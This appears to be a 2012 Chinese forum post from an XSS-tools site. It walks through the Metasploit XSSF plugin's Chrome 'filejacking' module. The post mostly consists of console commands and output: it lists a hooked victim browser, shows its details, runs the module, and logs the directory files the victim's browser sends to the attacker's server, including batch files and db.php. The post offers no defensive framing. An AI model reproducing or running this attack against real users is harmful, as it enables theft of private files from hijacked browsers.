切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
254 Xssf :Filejacking gg浏览器[复制链接]
发表于 2012-9-11 23:40:05 | 显示全部楼层 |!read_mode!
  1. msf > xssf_victims

  2. Victims
  3. =======

  4. id  xssf_server_id  active  ip       interval  browser_name   browser_version  cookie
  5. --  --------------  ------  --       --------  ------------   ---------------  ------
  6. 11  2               true    5.5.5.5  5         Google Chrome  21.0.1180.83     NO

  7. [*] Use xssf_information [VictimID] to see more information about a victim
  8. msf >
复制代码
查看详细信息


  1. msf > xssf_information 11

  2. INFORMATION ABOUT VICTIM 11
  3. ============================
  4. IP ADDRESS         : 5.5.5.5
  5. ACTIVE ?         : TRUE
  6. FIRST REQUEST         : 2012-08-22 23:55:44 UTC
  7. LAST REQUEST         : 2012-08-22 23:56:06 UTC
  8. CONNECTION TIME : 0hr 0min 22sec
  9. BROWSER NAME         : Google Chrome
  10. BROWSER VERSION : 21.0.1180.83
  11. OS NAME                : Windows
  12. OS VERSION         : XP
  13. ARCHITECTURE         : ARCH_X86
  14. LOCATION         : http://5.5.5.3:8888
  15. XSSF COOKIE ?        : YES
  16. RUNNING ATTACK         : NONE
  17. WAITING ATTACKS : 0
  18. msf >
复制代码
GOOGLE浏览器 WINDOWS XP系统


  1. msf > use auxiliary/xssf/public/chrome/filejacking
  2. msf  auxiliary(filejacking) > exploit
复制代码

目标机子跳出了个下载提示 当你选择目录 你能获得目录的文件:

图片:
http://d.fuzzexp.org/wp-content/uploads/2012/08/gg1.gif


  1. msf  auxiliary(filejacking) > exploit

  2. [*] Auxiliary module execution started, press [CTRL + C] to stop it !
  3. [*] Using URL: http://5.5.5.3:8080/ZhBVQ8Y1vMIliR

  4. [+] Remaining victims to attack: [11 (1)]

  5. [+] Code 'auxiliary/xssf/public/chrome/filejacking' sent to victim '11'
  6. [+] Remaining victims to attack: NONE
  7. [+] Response received from victim '11' from module 'FileJacking - `xampp/anonymous/.`'
  8. [+] Response received from victim '11' from module 'FileJacking - `xampp/apache/.`'
  9. [+] Response received from victim '11' from module 'FileJacking - `xampp/apache_start.bat`'
  10. [+] Response received from victim '11' from module 'FileJacking - `xampp/apache_stop.bat`'
  11. [+] Response received from victim '11' from module 'FileJacking - `xampp/catalina_service.bat`'
  12. [+] Response received from victim '11' from module 'FileJacking - `pen/about.txt`'
  13. [+] Response received from victim '11' from module 'FileJacking - `pen/code`'
  14. [+] Response received from victim '11' from module 'FileJacking - `pen/file.php`'
  15. [+] Response received from victim '11' from module 'FileJacking - `pen/db.php`'
  16. [+] Response received from victim '11' from module 'FileJacking - `pen/foot.html`'
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 07:20

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部